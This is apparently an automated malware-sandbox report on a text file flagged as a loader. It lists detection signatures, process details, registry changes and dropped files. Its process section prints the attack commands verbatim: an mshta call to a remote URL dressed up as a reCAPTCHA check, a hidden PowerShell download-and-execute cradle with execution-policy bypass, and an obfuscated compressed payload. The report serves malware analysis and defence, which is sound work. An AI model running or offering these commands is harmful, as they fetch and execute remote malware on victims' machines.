File name:

command.txt

Full analysis: https://app.any.run/tasks/40d2f4e7-5d75-4a10-9ae9-212f479fe4b5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 16, 2025, 20:46:31
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
reflection
loader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5:

DC1DECA98B2A00423E1BB3A5E17E6C2B

SHA1:

D09794C2BDA7CF8819852E814876F43FDB16B8D6

SHA256:

ED090E0FC361CFE38BE60C1BBFA56DAC5093CBC8AE64D3B0C382CB3E6CD22336

SSDEEP:

3:I5DBKWAI0IR0K0O78VW8P5ACt+RbqRF4I1yMQRWL7n:I/5iTKr8fCC0IMPy7n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6076)
      • powershell.exe (PID: 1292)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1292)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1292)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6076)
  • SUSPICIOUS

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 3288)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 1220)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 6076)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 1220)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6076)
    • Probably download files using WebClient

      • powershell.exe (PID: 6076)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6076)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 6076)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1292)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1292)
  • INFO

    • Process checks computer location settings

      • SearchApp.exe (PID: 5064)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 6824)
    • Reads the machine GUID from the registry

      • SearchApp.exe (PID: 5064)
    • Checks supported languages

      • SearchApp.exe (PID: 5064)
    • Manual execution by a user

      • powershell.exe (PID: 3288)
      • mshta.exe (PID: 2076)
      • mshta.exe (PID: 1220)
    • The process uses the downloaded file

      • powershell.exe (PID: 3288)
      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 6076)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 3288)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3288)
    • Reads the software policy settings

      • SearchApp.exe (PID: 5064)
    • Checks proxy server information

      • mshta.exe (PID: 1220)
      • powershell.exe (PID: 1292)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 1220)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1292)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
121
Monitored processes
10
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start notepad.exe no specs powershell.exe no specs conhost.exe no specs mshta.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs searchapp.exe

Process information

PID
CMD
Path
Indicators
Parent process
436\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1220"C:\windows\system32\mshta.exe" https://dokedok.shop/ru1-2.mp3 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
1292"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://hhhh.klipcewucyu.shop/Handler.db'))" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2076"C:\WINDOWS\system32\mshta.exe" C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
2976\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3288"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5064"C:\WINDOWS\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mcaC:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Search application
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\systemapps\microsoft.windows.search_cw5n1h2txyewy\searchapp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5308\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc $ C C w f r g M J 5 7 8 B v n i b 1 D M 6 C h 9 q n S i E y w 8 u Y I 0 h h r F p o O O Y 0 J r A w 6 C z W U y s L t N h U O Q G v H L a j C H a E y d i t b Z A 7 0 D z c S 6 a 6 b j y 5 p O M m e 3 X 8 F N A X e B p p E D 4 v 1 r k s N v s C A W b L 6 O A n K n Z c B Q Z Q m R t L g G R m 5 D n G 7 Q 3 U 3 v e 4 Q Q J V X U J Z O C i G N T H W B p z q J Q 7 B e L Q G v C 1 7 o z 9 2 J I P H H n r J l B f p A X E h I t H O Q Y i B q 9 P T 0 Y X l D 0 Y i I H d c G K 4 5 3 v Z L t h C W q j H M 9 j f 9 s 3 6 J Y 9 v D i 0 i W C u 5 y 1 P 4 E w u B H G C J W A J y j 8 z n 2 E D 1 y 3 t K c r y K c a v u E O Z P h P T O 0 T T I x 0 W R J G h Z n X h C O L T c U W 0 D P E f 0 G 7 2 e n o j W C J v H 4 x w 6 D T K 2 C C h T X C T x 5 x i W u G 1 R v c P d W i t J s T J z k y m k I D F 6 X K 0 S T Z x A 9 8 1 K s 6 I t I c k g Z n L H a c 7 D U m M j Y H 3 t 5 v R s D 4 a 3 e P g 7 J X O H N L 1 y 4 e o t y p i h K m g l S k a s b z j T j 4 f 3 n 7 s X y 0 T V k 2 a D l 2 5 m 1 S J 0 e p j J S 6 u 5 m W v 1 B h V H i 3 z X 7 4 g s 7 z 6 7 I 7 z k r m R W L p J 3 K r w 8 I P 0 5 i 0 9 y T j p o h b O F g j k 0 7 7 J J A h h 8 c U T A t 2 T E C V F z O M Z O M 4 Y W q 1 f A h e a e W J u j R S 5 l H K a 8 3 B h B A X f g 3 g H f L 3 V t b L G B P 6 k l 3 C p 4 Y S H C q R r y o s z 4 3 S i R 6 s Q a L 7 f v O t T V L Q 5   =   $ f A L s E  
 $ B f j 5 V Y u V 9 T 2 U C r O J Y q u g b o O M r s b j P 8 N 3 I n 1 v 1 i I 2 e V 0 D C o 8 A 7 e j b G 2 c d E y S o 8 I 2 6 y g 0 x 1 2 K t Q l r A i i u L a i 6 C L S O P n Q c g k u f S o L c 6 P P Y t d D 2 D a b 8 i D s q l Q D V i Z V Y o c S L C 7 Q N l 8 U I i l 2 k M W y k F 8 p E 8 P F Q o z Z X E H 9 Y M L P T B A g 4 5 B u 7 g l k l B G Z 0 p G p l X o 3 S f y f y X M M W d i q D e 6 Z 0 e n r S d f I M s F Z G o I U G r C B 0 d L m 9 G x B C V w h n O d y C 6 2 V H S J n O 1 g 1 8 l s u p b o K P V 0 A x V R 6 8 X G y X A m h X C Z h U g n 5 z U R p 9 q i g I j H t 2 r l C B h J G W n F 9 O 2 P q x 8 j T o C v J j M c Y r 9 K g 7 W w 1 V v p w r x J x h V F l k e m o 2 F i f w y O j 0 X 5 1 o R f M Y P X 5 H d i F 3 X v u D g Y l K g F Z Y h V 5 n 2 d b L e w E F k M x 4 V h q Z m f B p L Y D N 7 d J A B i f w O l G D g k R K Y K 3 p G N N d 8 j 7 E U 8 o E 9 f R T C H 9 Z 9 b Z P E 9 b S N 7 C A O J o z r d C k K z h y T f M m o 4 D R J Q R v Q C k g P i 4 K T D f N 3 1 l C R A g I N 6 9 I F m 9 W G H y K j o r t 3 t h w Z p 2 H I i L j e x j f w d X 3 B R n M Y 7 K I f   =   $ T r u E  
 $ o n F k z 4 J Y 4 F w B X 6 u d I x M 7 p L s b 1 S N Z b s v k h N Z K z O B v i U v D O H b H O O o E n T 5 z V S H X h 4 o B B o n v 3 9 l f n l V G L 0 Y 7 Y r A u r 7 7 H w N p i N 2 V e M n n X 6 w Q 8 X Y 9 0 k 0 Q X i t L Q S W S q u t a u 6 y p T N 3 y x 5 V P   =   $ N u l l  
 $ I L s x q t 9 p H 5 c m Y z 9 O e 1 A P m 5 W e w o X c e g 1 k l U p i 1 O i H P Q d N F C Z K H U s r I R N X G T a e d i P j V k x q y 3 l L s d 6 e s B k U U D T i J O a 2 s Z J k a l 1 W S h m H W f Q h 7 Z u P d r P 4 M H h v Q h a 9 y V 6 Z T y S 3 3 U A N 4 I 1 1 O 4 f N C i M c r 6 N 5 t Q r 3 R u 3 Q M G n 3 e V P t I Z 4 K 2 2 c W b 9 M L f E O r s U G I g v G N 1 M O C 0 l Q 3 f 9 o b O b R E p 9 P Z I 4 i s F I I g c v E X 8 7 0 A v P s 6 L L i O y R u M l M Q C 1 n L 5 W J Y C I Y Q N s Z 9 4 X I x K 6 7 K f g q L I 7 2 z X y 5 7 v 3 d d F g F o g o c T Q W B K i b c T L y M K K b 0 P k x q 7 n H l k I E h g e N 1 y f x r 3 t N Z X F 4 p s d 6 N X v m r 2 Q 2 s v N i c 6 F t 0 O t p M w w V v z k f u X O 4 P 1 O v j V J 0 J M i v h G J I 3 j V X F b V 4 l x O k o N k U 9 O 7 i U y h 3 i r A s s G I l o n 4 i g d b W r s 9 D C B R 7 z M D p v t c 1 6 v 4 w 4 1 i D S C 2 k Q Y 7 S S c 4 Y O e y P w R E N h o Z 8 1 c O O L t 5 6 E A E c 9 K 2 I g a H y 3 i K D W r A i v 9 s i p e l 0 b 5 n n d R g D V 6 I H C 7 s t r X M B i d o h z k y j E J s J W p r 8 q t A c e L 6 C L n u t S   = " D e f l a "   +   " t e S t r e a m " ; $ j g T w R 2 n x C 7 Y V 7 M u f 4 f g N A u u D z 1 H 2 w z n i q D p m R o G 4 X y d b p A U J C D y q B r x c 6 u v a m 6 I M Q b Q B a Z z g W b q e R F K H I y 3 n X O X l g 1 e v S X T N P P 7 Y S e L M Y 0 f 7 b n 6 f f w I U e 1 F v D o Z K O R j Q V H W 5 l u V M H a V 0 l P x 4 E O b 7 x 4 E K Z k y T P y W F V i X M F d E B n C G 5 q A b n l U C Y 8 1 k o w H U k B 1 g z b 0 F m 3 6 N X c 7 W i R Q I b G 8 f W y 4 6 s Y u O F A d E e c K b k T b s F X v S P z X m 0 R l m 9 S q 0 s g 4 D p O D z I l 5 v w 1 r V u Y S 3 d 0 Y b h C B s f W N J T o u B i R G j R c 8 R y u 2 X l f o D f 0 K o U V R O x x D v K 4 H 7 3 E P t 4 l s 0 U T m r F 7 b x 1 p q j X R C l e O a V o H N c 8 L u X Y z D 6 7 k 9 Y 7 Z Z r 9 M M 0 u s 4 P 3 p T 3 y X a 0 R f 9 M 6 e j r o e 3 K 9 1 A v r l N x s h n J A N X J J p J f 2   =   " C o m p r e "   +   " s s i o n " ;   $ 3 G m X q d h c r u I T P 0 9 1 d Z B y W 6 8 6 L v D u X 1 k N 3 m I t R i 0 8 N H n V 5 Q T 1 t h T P F l z v Y M P Z V S y I N B a P v a K r g A f 5 L Y O 1 Y q B u c m p G y 0 m k c f L N v K b t d w 2 e M F y 6 K a G 5 h q z V Y S n t N N h c x o 4 0 J M 4 e E x L P f O G Y C B k 9 O T m 7 u L d d I r U I 7 7 J r B B 5 d y C g 7 P U W 5 T Y V k J m E 5 v k W 1 1 E s r I r a U I 6 Y Q M K E 6 O M O c y X R v U J 5 i j B o X e p G t f 6 D X D L Z E n c I K g c X l u M n e O F C r C L Y N N P R G s w C t Z L A p e v I F 4 i W P Y Y Y C l 0 D w Y O 4 f I b U 5 D S L v 4 2 Z f n u i N 1 W N f f a 7 w v K 0 I 3 z C D Q z k M y 6 F e F 5 7 7 F 0 E o 1 F 0 W Q 2 v J I M k q s u 8 W b 3 X Q r o y M C l Q 5 p u r N V 1 8 G Q x H 7 u n D n x U z t r 8 F c f n c B r W 3 i b l G i S M U A S v T 2 T C h 1 A l 1 M R 9 6 l C 0 K L x 0 K Y U j 8 T l I D L P J c J Z j Y F d t v G H 7 W G w R J Y J 6 Q x 8 N A T 4 j u p a u I Q 9 J Y n 5 h s Y y u Y U 6 e k X K D 9 R j g o J P y R t 8 X 9 0 v U D L l 2 v j n M g L h 8 h D f L d D Z m x Z j D Z w a L w J v L K k P M q t 2   = " S t r e a "   +   " m R e a d e r " ;   . ( " i " + " e x " )   $ ( N e w - O b j e c t   I O . $ 3 G m X q d h c r U i T p 0 9 1 D Z B Y w 6 8 6 l v D U X 1 k N 3 M I t r I 0 8 n h n v 5 q T 1 T h t P f L Z V y M P Z v S y i N B A P v A K r G a f 5 l y O 1 Y q B U C M P G Y 0 M k C F L n V k b T d W 2 e M f Y 6 k a g 5 H q z V Y S n T n n h C x o 4 0 j M 4 E E X l P f O G Y c B k 9 O t M 7 u l d D i R U I 7 7 j r b b 5 D Y c G 7 p u w 5 T y v K j m E 5 v K w 1 1 E S r I R a U i 6 Y Q m k E 6 O m o c Y X r v u J 5 i j b o x E p G t F 6 D X d l z e n C I k g C x L u M n e o F c R C L Y N n p r G S W c T Z l A p E V i f 4 i w P y y y C L 0 D w y O 4 F I b U 5 D S l V 4 2 Z F n U i N 1 W n f f a 7 w V K 0 I 3 Z c D q Z k m Y 6 F E f 5 7 7 f 0 e O 1 f 0 w q 2 v j I M K Q S u 8 w b 3 x q R o Y M c l q 5 P u R n v 1 8 G q x H 7 u N D N x u Z T R 8 f C f n C B r W 3 I B L G I S m u A S v T 2 T c H 1 a l 1 M R 9 6 L c 0 K l X 0 K Y U j 8 T L i D L p J c J z j y f D T V G h 7 W G W r J y j 6 Q x 8 n a T 4 J u P A U I q 9 j Y n 5 H s Y y u Y U 6 e K x K d 9 R J g o J P y R t 8 x 9 0 V U D L L 2 v J N M g l H 8 H d F l D D Z m x Z j d z w A L W J v l k K P m Q T 2   ( $ ( N e w - O b j e c t   i o . $ j G T w r 2 n x C 7 Y V 7 m u f 4 F g N a U U d z 1 H 2 W Z n i q D p m r O G 4 x Y D B P A U j c D Y Q B r x C 6 u V a m 6 I m q B q B a z Z G W b q e R F k H i y 3 n X o x L G 1 E v S X t n p P 7 y s E L M Y 0 F 7 B N 6 f f W i U e 1 F V d O z K o R j q v h w 5 l U v m H A V 0 L p x 4 E o b 7 x 4 E K Z K y t P Y w F V i x M F D E b N C g 5 Q A b N l U c y 8 1 k o w H U K b 1 g z b 0 f m 3 6 N X C 7 w I r q i B G 8 f W Y 4 6 s Y U o F A d E E C k B K T B S f X V S p z X m 0 r L M 9 S Q 0 S G 4 D P O D Z i L 5 v w 1 R v U Y s 3 D 0 Y b h c B S F W n J T O U b I r g j r C 8 r y u 2 X l f O D F 0 k O U v r O x X d v K 4 h 7 3 E p t 4 L s 0 u T M R F 7 B x 1 P q J x R C l E o A V o H N c 8 l U x y Z D 6 7 k 9 y 7 z z r 9 M M 0 u S 4 p 3 p t 3 Y x A 0 r F 9 M 6 e J R o E 3 k 9 1 a v r L n X S H n J a n x j J p J F 2 . $ i L S x Q T 9 P h 5 c M Y z 9 O E 1 A p m 5 w E W O X C e g 1 K l U P I 1 O i H P q D n F c Z k h u s r i r N x g t a E d I p j v k X Q y 3 l l S d 6 e S b K U u D t I J O A 2 S Z j K a l 1 w s H M h w f q H 7 Z u p d r P 4 M h H v Q H A 9 y v 6 Z t y s 3 3 u A n 4 I 1 1 O 4 F N c I m C r 6 n 5 t q R 3 R U 3 Q M G N 3 e v P T I z 4 K 2 2 C W b 9 m L F e o r s U G I g V G N 1 m O c 0 l Q 3 F 9 O b O B R E p 9 P Z i 4 I S F I I g c v E X 8 7 0 a v P s 6 L l I O Y R U m l m q c 1 n l 5 w J y c i Y Q n s Z 9 4 x I X K 6 7 K F G Q L i 7 2 Z x Y 5 7 V 3 D D f G F o G O c T q W b k I b c T L y m K K b 0 P K x Q 7 N h L k I E h g E N 1 Y F x r 3 t n Z x f 4 P s d 6 N X v M r 2 Q 2 S v N i C 6 f t 0 o t p M w w v V Z k F u x O 4 p 1 O v J V J 0 J m I V H g J i 3 J v x f B V 4 l x o K o N k u 9 o 7 i u y h 3 I r a S s G I L O n 4 i g d b W R s 9 d c b R 7 Z M d p V T C 1 6 v 4 W 4 1 I d s C 2 k Q y 7 s S C 4 Y o E Y p W r e n h O z 8 1 c o O L t 5 6 e A E C 9 K 2 i g a H y 3 I k d W R a i V 9 s i P E l 0 B 5 n n D R g d v 6 I h c 7 S T r X m b I D O h Z K y j E J s j w p r 8 Q t A c e l 6 C L n u t s   ( $ ( N e w - O b j e c t   i o . m e M o R y s t R E A m ( , $ ( [ C o n v e r t ] : : ( " F r o m B "   + " a s e 6 "   +   " 4 S t r i n g " ) ( " N Y 8 x b 8 I w F I T / y p M X k s F O k V A H t i o M D B U g e c i S g S R + w g b H t u w X T P 5 9 T a v e d j d 8 d y d p i M Q v 0 U + Y E r B 2 3 3 f G K Z 9 T L 9 f U + f y 5 + w 8 u P m O U G q 3 t n 1 v x 0 Y e 3 T 2 8 v 8 I U M + F e 8 L T M 6 + j a J g P E M 2 i i F D j g G G N c w F D 5 3 P g B v / T w P T s G V G X x B V Z 0 w 8 / N 4 x 4 m g l B L O 4 o Q k O h x b a w q v F g e f n f W D k h S N u 1 U b T R T S v m l 0 k X h Y E y b M y 7 Q u I m k f m m N h W 4 x C j Z u 6 v r K y 7 O + B p N U i H H 9 H / Q A = " ) ) ) ) ,   [ I o . C O m P r E s S i o N . c O m p r e S S i o N m O D E ] : : ( " D e "   + " c o m p r e s s " ) ) ) ,   [ T E x t . e N c O D I N g ] : : A S C I I ) ) . R e a d T o E n d ( ) ; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
6824"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\command.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events
24 440
Read events
24 284
Write events
152
Delete events
4

Modification events

(PID) Process:(5064) SearchApp.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\A1hdl50UVDh2ZbG324Nx-6fZgntcGnHOs5kHLdmaJYE\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Speech_OneCore\Recognizers
Operation:writeName:DefaultTokenId
Value:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech_OneCore\Recognizers\Tokens\MS-1033-110-WINMO-DNN
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsMSACloudSearchEnabled
Value:
0
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:IsAADCloudSearchEnabled
Value:
0
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:writeName:CortanaStateLastRun
Value:
6E70896700000000
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:delete valueName:CachedFeatureString
Value:
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings
Operation:writeName:SafeSearchMode
Value:
1
(PID) Process:(5064) SearchApp.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting
Operation:writeName:CachedFeatureString
Value:
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_USEREMAIL
Value:
00004EE071E35768DB01
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_ACCOUNTTYPETEXT
Value:
00004EE071E35768DB01
(PID) Process:(5064) SearchApp.exeKey:\REGISTRY\A\{ee080948-b2ea-145a-6870-f9164b908eb9}\LocalState
Operation:writeName:BINGIDENTITY_PROP_ACCOUNTTYPE
Value:
00004EE071E35768DB01
Executable files
0
Suspicious files
68
Text files
121
Unknown types
0

Dropped files

PID
Process
Filename
Type
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\ZWUI0EBX\www.bing[1].xmltext
MD5:883BB45BEF044AFB4AD1CAC1991B67CA
SHA256:F78D6D82D3FDB27654B36AEA7C513426BBF6B1BCA6B40235655FED2540690D94
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\mIBK4Tj4MH4TuENc-SRjlybWA2M[1].csstext
MD5:61218F90D3B3B1F74B9253D4E5DDF682
SHA256:0553F7C64CC8A8034532FF32F86F5B0DDB061D03843B66C0868CDCA1674E03CC
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbresbinary
MD5:4CA516B6BF2179A0EC5922796FFFEE11
SHA256:E48B023CDB13F22F41DCAE1D7394E59DF846BF938EC72A2A8078B0465FB7AC12
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\AptopUBu7_oVDubJxwvaIprW-lI[1].csstext
MD5:4E0E75684C84C0102CED12948B95609B
SHA256:4D18E491B2DE4DA34F6C15F0574911613E902F791FE72501E4404802760D1BCA
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\wU-YmSK-j9YaNg2gj_x4wAl_UoI[1].csstext
MD5:C1AC4CCA38EA836717738D7CF72B45B9
SHA256:E4C0BF089E674482FA2FE7D558F64F9D3EBDD414EAED18908E34A6140D09B727
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbresbinary
MD5:4BB4BAA6886E3FA9F8EEB171AEFF8807
SHA256:4FBD74931A70B823AFBABC318F51165EA8A03F431FCFA8861366DFE3EB91AF67
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\EDR6aHlON56kRFUYoTu1poTQKHc.br[1].jsbinary
MD5:CB035F15ED6E8CAB42F08C38CFA49F81
SHA256:89C859D7DF60C8350DAF9F664FFBB76B01DCCFAED8FDBCBAB2B4B4FA76A09C15
5064SearchApp.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5Y734AMR\67\5qSqWyip_grL-s7BafaqI3Mrk9M.br[1].jsbinary
MD5:23C987E711C002D4CA3CD02DEEDC9BBF
SHA256:A1C2F4C8CA6113EBDAC36F2C33D6CE19BCF2F4BD99EC06E8BA845E2B25B03322
